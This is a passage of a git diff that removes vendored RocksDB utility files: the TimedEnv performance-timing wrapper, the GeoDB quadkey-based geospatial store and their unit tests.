-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_random_access_file_nanos);
-    return EnvWrapper::NewRandomAccessFile(fname, result, options);
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_writable_file_nanos);
-    return EnvWrapper::NewWritableFile(fname, result, options);
-  }
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_reuse_writable_file_nanos);
-    return EnvWrapper::ReuseWritableFile(fname, old_fname, result, options);
-  }
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_random_rw_file_nanos);
-    return EnvWrapper::NewRandomRWFile(fname, result, options);
-  }
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    PERF_TIMER_GUARD(env_new_directory_nanos);
-    return EnvWrapper::NewDirectory(name, result);
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    PERF_TIMER_GUARD(env_file_exists_nanos);
-    return EnvWrapper::FileExists(fname);
-  }
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    PERF_TIMER_GUARD(env_get_children_nanos);
-    return EnvWrapper::GetChildren(dir, result);
-  }
-
-  virtual Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    PERF_TIMER_GUARD(env_get_children_file_attributes_nanos);
-    return EnvWrapper::GetChildrenFileAttributes(dir, result);
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    PERF_TIMER_GUARD(env_delete_file_nanos);
-    return EnvWrapper::DeleteFile(fname);
-  }
-
-  virtual Status CreateDir(const std::string& dirname) override {
-    PERF_TIMER_GUARD(env_create_dir_nanos);
-    return EnvWrapper::CreateDir(dirname);
-  }
-
-  virtual Status CreateDirIfMissing(const std::string& dirname) override {
-    PERF_TIMER_GUARD(env_create_dir_if_missing_nanos);
-    return EnvWrapper::CreateDirIfMissing(dirname);
-  }
-
-  virtual Status DeleteDir(const std::string& dirname) override {
-    PERF_TIMER_GUARD(env_delete_dir_nanos);
-    return EnvWrapper::DeleteDir(dirname);
-  }
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* file_size) override {
-    PERF_TIMER_GUARD(env_get_file_size_nanos);
-    return EnvWrapper::GetFileSize(fname, file_size);
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) override {
-    PERF_TIMER_GUARD(env_get_file_modification_time_nanos);
-    return EnvWrapper::GetFileModificationTime(fname, file_mtime);
-  }
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& dst) override {
-    PERF_TIMER_GUARD(env_rename_file_nanos);
-    return EnvWrapper::RenameFile(src, dst);
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& dst) override {
-    PERF_TIMER_GUARD(env_link_file_nanos);
-    return EnvWrapper::LinkFile(src, dst);
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    PERF_TIMER_GUARD(env_lock_file_nanos);
-    return EnvWrapper::LockFile(fname, lock);
-  }
-
-  virtual Status UnlockFile(FileLock* lock) override {
-    PERF_TIMER_GUARD(env_unlock_file_nanos);
-    return EnvWrapper::UnlockFile(lock);
-  }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    PERF_TIMER_GUARD(env_new_logger_nanos);
-    return EnvWrapper::NewLogger(fname, result);
-  }
-};
-
-Env* NewTimedEnv(Env* base_env) { return new TimedEnv(base_env); }
-
-#else  // ROCKSDB_LITE
-
-Env* NewTimedEnv(Env* base_env) { return nullptr; }
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/env_timed_test.cc b/thirdparty/rocksdb/utilities/env_timed_test.cc
deleted file mode 100644
index 41d05e1..0000000
--- a/thirdparty/rocksdb/utilities/env_timed_test.cc
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/env.h"
-#include "rocksdb/perf_context.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class TimedEnvTest : public testing::Test {
-};
-
-TEST_F(TimedEnvTest, BasicTest) {
-  SetPerfLevel(PerfLevel::kEnableTime);
-  ASSERT_EQ(0, get_perf_context()->env_new_writable_file_nanos);
-
-  std::unique_ptr<Env> mem_env(NewMemEnv(Env::Default()));
-  std::unique_ptr<Env> timed_env(NewTimedEnv(mem_env.get()));
-  std::unique_ptr<WritableFile> writable_file;
-  timed_env->NewWritableFile("f", &writable_file, EnvOptions());
-
-  ASSERT_GT(get_perf_context()->env_new_writable_file_nanos, 0);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else  // ROCKSDB_LITE
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as TimedEnv is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/geodb/geodb_impl.cc b/thirdparty/rocksdb/utilities/geodb/geodb_impl.cc
deleted file mode 100644
index a574e84..0000000
--- a/thirdparty/rocksdb/utilities/geodb/geodb_impl.cc
+++ /dev/null
@@ -1,477 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/geodb/geodb_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <limits>
-#include <map>
-#include <string>
-#include <vector>
-#include "util/coding.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-
-//
-// There are two types of keys. The first type of key-values
-// maps a geo location to the set of object ids and their values.
-// Table 1
-//   key     : p + : + $quadkey + : + $id +
-//             : + $latitude + : + $longitude
-//   value  :  value of the object
-// This table can be used to find all objects that reside near
-// a specified geolocation.
-//
-// Table 2
-//   key  : 'k' + : + $id
-//   value:  $quadkey
-
-namespace rocksdb {
-
-const double GeoDBImpl::PI = 3.141592653589793;
-const double GeoDBImpl::EarthRadius = 6378137;
-const double GeoDBImpl::MinLatitude = -85.05112878;
-const double GeoDBImpl::MaxLatitude = 85.05112878;
-const double GeoDBImpl::MinLongitude = -180;
-const double GeoDBImpl::MaxLongitude = 180;
-
-GeoDBImpl::GeoDBImpl(DB* db, const GeoDBOptions& options) :
-  GeoDB(db, options), db_(db), options_(options) {
-}
-
-GeoDBImpl::~GeoDBImpl() {
-}
-
-Status GeoDBImpl::Insert(const GeoObject& obj) {
-  WriteBatch batch;
-
-  // It is possible that this id is already associated with
-  // with a different position. We first have to remove that
-  // association before we can insert the new one.
-
-  // remove existing object, if it exists
-  GeoObject old;
-  Status status = GetById(obj.id, &old);
-  if (status.ok()) {
-    assert(obj.id.compare(old.id) == 0);
-    std::string quadkey = PositionToQuad(old.position, Detail);
-    std::string key1 = MakeKey1(old.position, old.id, quadkey);
-    std::string key2 = MakeKey2(old.id);
-    batch.Delete(Slice(key1));
-    batch.Delete(Slice(key2));
-  } else if (status.IsNotFound()) {
-    // What if another thread is trying to insert the same ID concurrently?
-  } else {
-    return status;
-  }
-
-  // insert new object
-  std::string quadkey = PositionToQuad(obj.position, Detail);
-  std::string key1 = MakeKey1(obj.position, obj.id, quadkey);
-  std::string key2 = MakeKey2(obj.id);
-  batch.Put(Slice(key1), Slice(obj.value));
-  batch.Put(Slice(key2), Slice(quadkey));
-  return db_->Write(woptions_, &batch);
-}
-
-Status GeoDBImpl::GetByPosition(const GeoPosition& pos,
-                                const Slice& id,
-                                std::string* value) {
-  std::string quadkey = PositionToQuad(pos, Detail);
-  std::string key1 = MakeKey1(pos, id, quadkey);
-  return db_->Get(roptions_, Slice(key1), value);
-}
-
-Status GeoDBImpl::GetById(const Slice& id, GeoObject* object) {
-  Status status;
-  std::string quadkey;
-
-  // create an iterator so that we can get a consistent picture
-  // of the database.
-  Iterator* iter = db_->NewIterator(roptions_);
-
-  // create key for table2
-  std::string kt = MakeKey2(id);
-  Slice key2(kt);
-
-  iter->Seek(key2);
-  if (iter->Valid() && iter->status().ok()) {
-    if (iter->key().compare(key2) == 0) {
-      quadkey = iter->value().ToString();
-    }
-  }
-  if (quadkey.size() == 0) {
-    delete iter;
-    return Status::NotFound(key2);
-  }
-
-  //
-  // Seek to the quadkey + id prefix
-  //
-  std::string prefix = MakeKey1Prefix(quadkey, id);
-  iter->Seek(Slice(prefix));
-  assert(iter->Valid());
-  if (!iter->Valid() || !iter->status().ok()) {
-    delete iter;
-    return Status::NotFound();
-  }
-
-  // split the key into p + quadkey + id + lat + lon
-  Slice key = iter->key();
-  std::vector<std::string> parts = StringSplit(key.ToString(), ':');
-  assert(parts.size() == 5);
-  assert(parts[0] == "p");
-  assert(parts[1] == quadkey);
-  assert(parts[2] == id);
-
-  // fill up output parameters
-  object->position.latitude = atof(parts[3].c_str());
-  object->position.longitude = atof(parts[4].c_str());
-  object->id = id.ToString();  // this is redundant
-  object->value = iter->value().ToString();
-  delete iter;
-  return Status::OK();
-}
-
-
-Status GeoDBImpl::Remove(const Slice& id) {
-  // Read the object from the database
-  GeoObject obj;
-  Status status = GetById(id, &obj);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // remove the object by atomically deleting it from both tables
-  std::string quadkey = PositionToQuad(obj.position, Detail);
-  std::string key1 = MakeKey1(obj.position, obj.id, quadkey);
-  std::string key2 = MakeKey2(obj.id);
-  WriteBatch batch;
-  batch.Delete(Slice(key1));
-  batch.Delete(Slice(key2));
-  return db_->Write(woptions_, &batch);
-}
-
-class GeoIteratorImpl : public GeoIterator {
- private:
-  std::vector<GeoObject> values_;
-  std::vector<GeoObject>::iterator iter_;
- public:
-  explicit GeoIteratorImpl(std::vector<GeoObject> values)
-    : values_(std::move(values)) {
-    iter_ = values_.begin();
-  }
-  virtual void Next() override;
-  virtual bool Valid() const override;
-  virtual const GeoObject& geo_object() override;
-  virtual Status status() const override;
-};
-
-class GeoErrorIterator : public GeoIterator {
- private:
-  Status status_;
- public:
-  explicit GeoErrorIterator(Status s) : status_(s) {}
-  virtual void Next() override {};
-  virtual bool Valid() const override { return false; }
-  virtual const GeoObject& geo_object() override {
-    GeoObject* g = new GeoObject();
-    return *g;
-  }
-  virtual Status status() const override { return status_; }
-};
-
-void GeoIteratorImpl::Next() {
-  assert(Valid());
-  iter_++;
-}
-
-bool GeoIteratorImpl::Valid() const {
-  return iter_ != values_.end();
-}
-
-const GeoObject& GeoIteratorImpl::geo_object() {
-  assert(Valid());
-  return *iter_;
-}
-
-Status GeoIteratorImpl::status() const {
-  return Status::OK();
-}
-
-GeoIterator* GeoDBImpl::SearchRadial(const GeoPosition& pos,
-  double radius,
-  int number_of_values) {
-  std::vector<GeoObject> values;
-
-  // Gather all bounding quadkeys
-  std::vector<std::string> qids;
-  Status s = searchQuadIds(pos, radius, &qids);
-  if (!s.ok()) {
-    return new GeoErrorIterator(s);
-  }
-
-  // create an iterator
-  Iterator* iter = db_->NewIterator(ReadOptions());
-
-  // Process each prospective quadkey
-  for (std::string qid : qids) {
-    // The user is interested in only these many objects.
-    if (number_of_values == 0) {
-      break;
-    }
-
-    // convert quadkey to db key prefix
-    std::string dbkey = MakeQuadKeyPrefix(qid);
-
-    for (iter->Seek(dbkey);
-         number_of_values > 0 && iter->Valid() && iter->status().ok();
-         iter->Next()) {
-      // split the key into p + quadkey + id + lat + lon
-      Slice key = iter->key();
-      std::vector<std::string> parts = StringSplit(key.ToString(), ':');
-      assert(parts.size() == 5);
-      assert(parts[0] == "p");
-      std::string* quadkey = &parts[1];
-
-      // If the key we are looking for is a prefix of the key
-      // we found from the database, then this is one of the keys
-      // we are looking for.
-      auto res = std::mismatch(qid.begin(), qid.end(), quadkey->begin());
-      if (res.first == qid.end()) {
-        GeoPosition obj_pos(atof(parts[3].c_str()), atof(parts[4].c_str()));
-        GeoObject obj(obj_pos, parts[4], iter->value().ToString());
-        values.push_back(obj);
-        number_of_values--;
-      } else {
-        break;
-      }
-    }
-  }
-  delete iter;
-  return new GeoIteratorImpl(std::move(values));
-}
-
-std::string GeoDBImpl::MakeKey1(const GeoPosition& pos, Slice id,
-                                std::string quadkey) {
-  std::string lat = rocksdb::ToString(pos.latitude);
-  std::string lon = rocksdb::ToString(pos.longitude);
-  std::string key = "p:";
-  key.reserve(5 + quadkey.size() + id.size() + lat.size() + lon.size());
-  key.append(quadkey);
-  key.append(":");
-  key.append(id.ToString());
-  key.append(":");
-  key.append(lat);
-  key.append(":");
-  key.append(lon);
-  return key;
-}
-
-std::string GeoDBImpl::MakeKey2(Slice id) {
-  std::string key = "k:";
-  key.append(id.ToString());
-  return key;
-}
-
-std::string GeoDBImpl::MakeKey1Prefix(std::string quadkey,
-                                      Slice id) {
-  std::string key = "p:";
-  key.reserve(3 + quadkey.size() + id.size());
-  key.append(quadkey);
-  key.append(":");
-  key.append(id.ToString());
-  return key;
-}
-
-std::string GeoDBImpl::MakeQuadKeyPrefix(std::string quadkey) {
-  std::string key = "p:";
-  key.append(quadkey);
-  return key;
-}
-
-// convert degrees to radians
-double GeoDBImpl::radians(double x) {
-  return (x * PI) / 180;
-}
-
-// convert radians to degrees
-double GeoDBImpl::degrees(double x) {
-  return (x * 180) / PI;
-}
-
-// convert a gps location to quad coordinate
-std::string GeoDBImpl::PositionToQuad(const GeoPosition& pos,
-                                      int levelOfDetail) {
-  Pixel p = PositionToPixel(pos, levelOfDetail);
-  Tile tile = PixelToTile(p);
-  return TileToQuadKey(tile, levelOfDetail);
-}
-
-GeoPosition GeoDBImpl::displaceLatLon(double lat, double lon,
-                                      double deltay, double deltax) {
-  double dLat = deltay / EarthRadius;
-  double dLon = deltax / (EarthRadius * cos(radians(lat)));
-  return GeoPosition(lat + degrees(dLat),
-                     lon + degrees(dLon));
-}
-
-//
-// Return the distance between two positions on the earth
-//
-double GeoDBImpl::distance(double lat1, double lon1,
-                           double lat2, double lon2) {
-  double lon = radians(lon2 - lon1);
-  double lat = radians(lat2 - lat1);
-
-  double a = (sin(lat / 2) * sin(lat / 2)) +
-              cos(radians(lat1)) * cos(radians(lat2)) *
-              (sin(lon / 2) * sin(lon / 2));
-  double angle = 2 * atan2(sqrt(a), sqrt(1 - a));
-  return angle * EarthRadius;
-}
-
-//
-// Returns all the quadkeys inside the search range
-//
-Status GeoDBImpl::searchQuadIds(const GeoPosition& position,
-                                double radius,
-                                std::vector<std::string>* quadKeys) {
-  // get the outline of the search square
-  GeoPosition topLeftPos = boundingTopLeft(position, radius);
-  GeoPosition bottomRightPos = boundingBottomRight(position, radius);
-
-  Pixel topLeft =  PositionToPixel(topLeftPos, Detail);
-  Pixel bottomRight =  PositionToPixel(bottomRightPos, Detail);
-
-  // how many level of details to look for
-  int numberOfTilesAtMaxDepth = static_cast<int>(std::floor((bottomRight.x - topLeft.x) / 256));
-  int zoomLevelsToRise = static_cast<int>(std::floor(std::log(numberOfTilesAtMaxDepth) / std::log(2)));
-  zoomLevelsToRise++;
-  int levels = std::max(0, Detail - zoomLevelsToRise);
-
-  quadKeys->push_back(PositionToQuad(GeoPosition(topLeftPos.latitude,
-                                                 topLeftPos.longitude),
-                                     levels));
-  quadKeys->push_back(PositionToQuad(GeoPosition(topLeftPos.latitude,
-                                                 bottomRightPos.longitude),
-                                     levels));
-  quadKeys->push_back(PositionToQuad(GeoPosition(bottomRightPos.latitude,
-                                                 topLeftPos.longitude),
-                                     levels));
-  quadKeys->push_back(PositionToQuad(GeoPosition(bottomRightPos.latitude,
-                                                 bottomRightPos.longitude),
-                                     levels));
-  return Status::OK();
-}
-
-// Determines the ground resolution (in meters per pixel) at a specified
-// latitude and level of detail.
-// Latitude (in degrees) at which to measure the ground resolution.
-// Level of detail, from 1 (lowest detail) to 23 (highest detail).
-// Returns the ground resolution, in meters per pixel.
-double GeoDBImpl::GroundResolution(double latitude, int levelOfDetail) {
-  latitude = clip(latitude, MinLatitude, MaxLatitude);
-  return cos(latitude * PI / 180) * 2 * PI * EarthRadius /
-         MapSize(levelOfDetail);
-}
-
-// Converts a point from latitude/longitude WGS-84 coordinates (in degrees)
-// into pixel XY coordinates at a specified level of detail.
-GeoDBImpl::Pixel GeoDBImpl::PositionToPixel(const GeoPosition& pos,
-                                            int levelOfDetail) {
-  double latitude = clip(pos.latitude, MinLatitude, MaxLatitude);
-  double x = (pos.longitude + 180) / 360;
-  double sinLatitude = sin(latitude * PI / 180);
-  double y = 0.5 - std::log((1 + sinLatitude) / (1 - sinLatitude)) / (4 * PI);
-  double mapSize = MapSize(levelOfDetail);
-  double X = std::floor(clip(x * mapSize + 0.5, 0, mapSize - 1));
-  double Y = std::floor(clip(y * mapSize + 0.5, 0, mapSize - 1));
-  return Pixel((unsigned int)X, (unsigned int)Y);
-}
-
-GeoPosition GeoDBImpl::PixelToPosition(const Pixel& pixel, int levelOfDetail) {
-  double mapSize = MapSize(levelOfDetail);
-  double x = (clip(pixel.x, 0, mapSize - 1) / mapSize) - 0.5;
-  double y = 0.5 - (clip(pixel.y, 0, mapSize - 1) / mapSize);
-  double latitude = 90 - 360 * atan(exp(-y * 2 * PI)) / PI;
-  double longitude = 360 * x;
-  return GeoPosition(latitude, longitude);
-}
-
-// Converts a Pixel to a Tile
-GeoDBImpl::Tile GeoDBImpl::PixelToTile(const Pixel& pixel) {
-  unsigned int tileX = static_cast<unsigned int>(std::floor(pixel.x / 256));
-  unsigned int tileY = static_cast<unsigned int>(std::floor(pixel.y / 256));
-  return Tile(tileX, tileY);
-}
-
-GeoDBImpl::Pixel GeoDBImpl::TileToPixel(const Tile& tile) {
-  unsigned int pixelX = tile.x * 256;
-  unsigned int pixelY = tile.y * 256;
-  return Pixel(pixelX, pixelY);
-}
-
-// Convert a Tile to a quadkey
-std::string GeoDBImpl::TileToQuadKey(const Tile& tile, int levelOfDetail) {
-  std::stringstream quadKey;
-  for (int i = levelOfDetail; i > 0; i--) {
-    char digit = '0';
-    int mask = 1 << (i - 1);
-    if ((tile.x & mask) != 0) {
-      digit++;
-    }
-    if ((tile.y & mask) != 0) {
-      digit++;
-      digit++;
-    }
-    quadKey << digit;
-  }
-  return quadKey.str();
-}
-
-//
-// Convert a quadkey to a tile and its level of detail
-//
-void GeoDBImpl::QuadKeyToTile(std::string quadkey, Tile* tile,
-                              int* levelOfDetail) {
-  tile->x = tile->y = 0;
-  *levelOfDetail = static_cast<int>(quadkey.size());
-  const char* key = reinterpret_cast<const char*>(quadkey.c_str());
-  for (int i = *levelOfDetail; i > 0; i--) {
-    int mask = 1 << (i - 1);
-    switch (key[*levelOfDetail - i]) {
-      case '0':
-        break;
-
-      case '1':
-        tile->x |= mask;
-        break;
-
-      case '2':
-        tile->y |= mask;
-        break;
-
-      case '3':
-        tile->x |= mask;
-        tile->y |= mask;
-        break;
-
-      default:
-        std::stringstream msg;
-        msg << quadkey;
-        msg << " Invalid QuadKey.";
-        throw std::runtime_error(msg.str());
-    }
-  }
-}
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/geodb/geodb_impl.h b/thirdparty/rocksdb/utilities/geodb/geodb_impl.h
deleted file mode 100644
index 6b15f54..0000000
--- a/thirdparty/rocksdb/utilities/geodb/geodb_impl.h
+++ /dev/null
@@ -1,185 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-#include <algorithm>
-#include <cmath>
-#include <string>
-#include <sstream>
-#include <stdexcept>
-#include <vector>
-
-#include "rocksdb/utilities/geo_db.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// A specific implementation of GeoDB
-
-class GeoDBImpl : public GeoDB {
- public:
-  GeoDBImpl(DB* db, const GeoDBOptions& options);
-  ~GeoDBImpl();
-
-  // Associate the GPS location with the identified by 'id'. The value
-  // is a blob that is associated with this object.
-  virtual Status Insert(const GeoObject& object) override;
-
-  // Retrieve the value of the object located at the specified GPS
-  // location and is identified by the 'id'.
-  virtual Status GetByPosition(const GeoPosition& pos, const Slice& id,
-                               std::string* value) override;
-
-  // Retrieve the value of the object identified by the 'id'. This method
-  // could be potentially slower than GetByPosition
-  virtual Status GetById(const Slice& id, GeoObject* object) override;
-
-  // Delete the specified object
-  virtual Status Remove(const Slice& id) override;
-
-  // Returns a list of all items within a circular radius from the
-  // specified gps location
-  virtual GeoIterator* SearchRadial(const GeoPosition& pos, double radius,
-                                    int number_of_values) override;
-
- private:
-  DB* db_;
-  const GeoDBOptions options_;
-  const WriteOptions woptions_;
-  const ReadOptions roptions_;
-
-  // MSVC requires the definition for this static const to be in .CC file
-  // The value of PI
-  static const double PI;
-
-  // convert degrees to radians
-  static double radians(double x);
-
-  // convert radians to degrees
-  static double degrees(double x);
-
-  // A pixel class that captures X and Y coordinates
-  class Pixel {
-   public:
-    unsigned int x;
-    unsigned int y;
-    Pixel(unsigned int a, unsigned int b) :
-     x(a), y(b) {
-    }
-  };
-
-  // A Tile in the geoid
-  class Tile {
-   public:
-    unsigned int x;
-    unsigned int y;
-    Tile(unsigned int a, unsigned int b) :
-     x(a), y(b) {
-    }
-  };
-
-  // convert a gps location to quad coordinate
-  static std::string PositionToQuad(const GeoPosition& pos, int levelOfDetail);
-
-  // arbitrary constant use for WGS84 via
-  // http://en.wikipedia.org/wiki/World_Geodetic_System
-  // http://mathforum.org/library/drmath/view/51832.html
-  // http://msdn.microsoft.com/en-us/library/bb259689.aspx
-  // http://www.tuicool.com/articles/NBrE73
-  //
-  const int Detail = 23;
-  // MSVC requires the definition for this static const to be in .CC file
-  static const double EarthRadius;
-  static const double MinLatitude;
-  static const double MaxLatitude;
-  static const double MinLongitude;
-  static const double MaxLongitude;
-
-  // clips a number to the specified minimum and maximum values.
-  static double clip(double n, double minValue, double maxValue) {
-    return fmin(fmax(n, minValue), maxValue);
-  }
-
-  // Determines the map width and height (in pixels) at a specified level
-  // of detail, from 1 (lowest detail) to 23 (highest detail).
-  // Returns the map width and height in pixels.
-  static unsigned int MapSize(int levelOfDetail) {
-    return (unsigned int)(256 << levelOfDetail);
-  }
-
-  // Determines the ground resolution (in meters per pixel) at a specified
-  // latitude and level of detail.
-  // Latitude (in degrees) at which to measure the ground resolution.
-  // Level of detail, from 1 (lowest detail) to 23 (highest detail).
-  // Returns the ground resolution, in meters per pixel.
-  static double GroundResolution(double latitude, int levelOfDetail);
-
-  // Converts a point from latitude/longitude WGS-84 coordinates (in degrees)
-  // into pixel XY coordinates at a specified level of detail.
-  static Pixel PositionToPixel(const GeoPosition& pos, int levelOfDetail);
-
-  static GeoPosition PixelToPosition(const Pixel& pixel, int levelOfDetail);
-
-  // Converts a Pixel to a Tile
-  static Tile PixelToTile(const Pixel& pixel);
-
-  static Pixel TileToPixel(const Tile& tile);
-
-  // Convert a Tile to a quadkey
-  static std::string TileToQuadKey(const Tile& tile, int levelOfDetail);
-
-  // Convert a quadkey to a tile and its level of detail
-  static void QuadKeyToTile(std::string quadkey, Tile* tile,
-                            int *levelOfDetail);
-
-  // Return the distance between two positions on the earth
-  static double distance(double lat1, double lon1,
-                         double lat2, double lon2);
-  static GeoPosition displaceLatLon(double lat, double lon,
-                                    double deltay, double deltax);
-
-  //
-  // Returns the top left position after applying the delta to
-  // the specified position
-  //
-  static GeoPosition boundingTopLeft(const GeoPosition& in, double radius) {
-    return displaceLatLon(in.latitude, in.longitude, -radius, -radius);
-  }
-
-  //
-  // Returns the bottom right position after applying the delta to
-  // the specified position
-  static GeoPosition boundingBottomRight(const GeoPosition& in,
-                                         double radius) {
-    return displaceLatLon(in.latitude, in.longitude, radius, radius);
-  }
-
-  //
-  // Get all quadkeys within a radius of a specified position
-  //
-  Status searchQuadIds(const GeoPosition& position,
-                       double radius,
-                       std::vector<std::string>* quadKeys);
-
-  //
-  // Create keys for accessing rocksdb table(s)
-  //
-  static std::string MakeKey1(const GeoPosition& pos,
-                              Slice id,
-                              std::string quadkey);
-  static std::string MakeKey2(Slice id);
-  static std::string MakeKey1Prefix(std::string quadkey,
-                                    Slice id);
-  static std::string MakeQuadKeyPrefix(std::string quadkey);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/geodb/geodb_test.cc b/thirdparty/rocksdb/utilities/geodb/geodb_test.cc
deleted file mode 100644
index dcdb982..0000000
--- a/thirdparty/rocksdb/utilities/geodb/geodb_test.cc
+++ /dev/null
@@ -1,140 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "utilities/geodb/geodb_impl.h"
-
-#include <cctype>
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class GeoDBTest : public testing::Test {
- public:
-  static const std::string kDefaultDbName;
-  static Options options;
-  DB* db;
-  GeoDB* geodb;
-
-  GeoDBTest() {
-    GeoDBOptions geodb_options;
-    EXPECT_OK(DestroyDB(kDefaultDbName, options));
-    options.create_if_missing = true;
-    Status status = DB::Open(options, kDefaultDbName, &db);
-    geodb =  new GeoDBImpl(db, geodb_options);
-  }
-
-  ~GeoDBTest() {
-    delete geodb;
-  }
-
-  GeoDB* getdb() {
-    return geodb;
-  }
-};
-
-const std::string GeoDBTest::kDefaultDbName = test::TmpDir() + "/geodb_test";
-Options GeoDBTest::options = Options();
-
-// Insert, Get and Remove
-TEST_F(GeoDBTest, SimpleTest) {
-  GeoPosition pos1(100, 101);
-  std::string id1("id1");
-  std::string value1("value1");
-
-  // insert first object into database
-  GeoObject obj1(pos1, id1, value1);
-  Status status = getdb()->Insert(obj1);
-  ASSERT_TRUE(status.ok());
-
-  // insert second object into database
-  GeoPosition pos2(200, 201);
-  std::string id2("id2");
-  std::string value2 = "value2";
-  GeoObject obj2(pos2, id2, value2);
-  status = getdb()->Insert(obj2);
-  ASSERT_TRUE(status.ok());
-
-  // retrieve first object using position
-  std::string value;
-  status = getdb()->GetByPosition(pos1, Slice(id1), &value);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(value, value1);
-
-  // retrieve first object using id
-  GeoObject obj;
-  status = getdb()->GetById(Slice(id1), &obj);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(obj.position.latitude, 100);
-  ASSERT_EQ(obj.position.longitude, 101);
-  ASSERT_EQ(obj.id.compare(id1), 0);
-  ASSERT_EQ(obj.value, value1);
-
-  // delete first object
-  status = getdb()->Remove(Slice(id1));
-  ASSERT_TRUE(status.ok());
-  status = getdb()->GetByPosition(pos1, Slice(id1), &value);
-  ASSERT_TRUE(status.IsNotFound());
-  status = getdb()->GetById(id1, &obj);
-  ASSERT_TRUE(status.IsNotFound());
-
-  // check that we can still find second object
-  status = getdb()->GetByPosition(pos2, id2, &value);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(value, value2);
-  status = getdb()->GetById(id2, &obj);
-  ASSERT_TRUE(status.ok());
-}
-
-// Search.
-// Verify distances via http://www.stevemorse.org/nearest/distance.php
-TEST_F(GeoDBTest, Search) {
-  GeoPosition pos1(45, 45);
-  std::string id1("mid1");
-  std::string value1 = "midvalue1";
-
-  // insert object at 45 degree latitude
-  GeoObject obj1(pos1, id1, value1);
-  Status status = getdb()->Insert(obj1);
-  ASSERT_TRUE(status.ok());
-
-  // search all objects centered at 46 degree latitude with
-  // a radius of 200 kilometers. We should find the one object that
-  // we inserted earlier.
-  GeoIterator* iter1 = getdb()->SearchRadial(GeoPosition(46, 46), 200000);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(iter1->geo_object().value, "midvalue1");
-  uint32_t size = 0;
-  while (iter1->Valid()) {
-    size++;
-    iter1->Next();
-  }
-  ASSERT_EQ(size, 1U);
-  delete iter1;
-
-  // search all objects centered at 46 degree latitude with
-  // a radius of 2 kilometers. There should be none.
-  GeoIterator* iter2 = getdb()->SearchRadial(GeoPosition(46, 46), 2);
-  ASSERT_TRUE(status.ok());
-  ASSERT_FALSE(iter2->Valid());
-  delete iter2;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char* argv[]) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-#else
-
-#include <stdio.h>
-
-int main() {
-  fprintf(stderr, "SKIPPED\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/leveldb_options/leveldb_options.cc b/thirdparty/rocksdb/utilities/leveldb_options/leveldb_options.cc
deleted file mode 100644
index 977585f..0000000
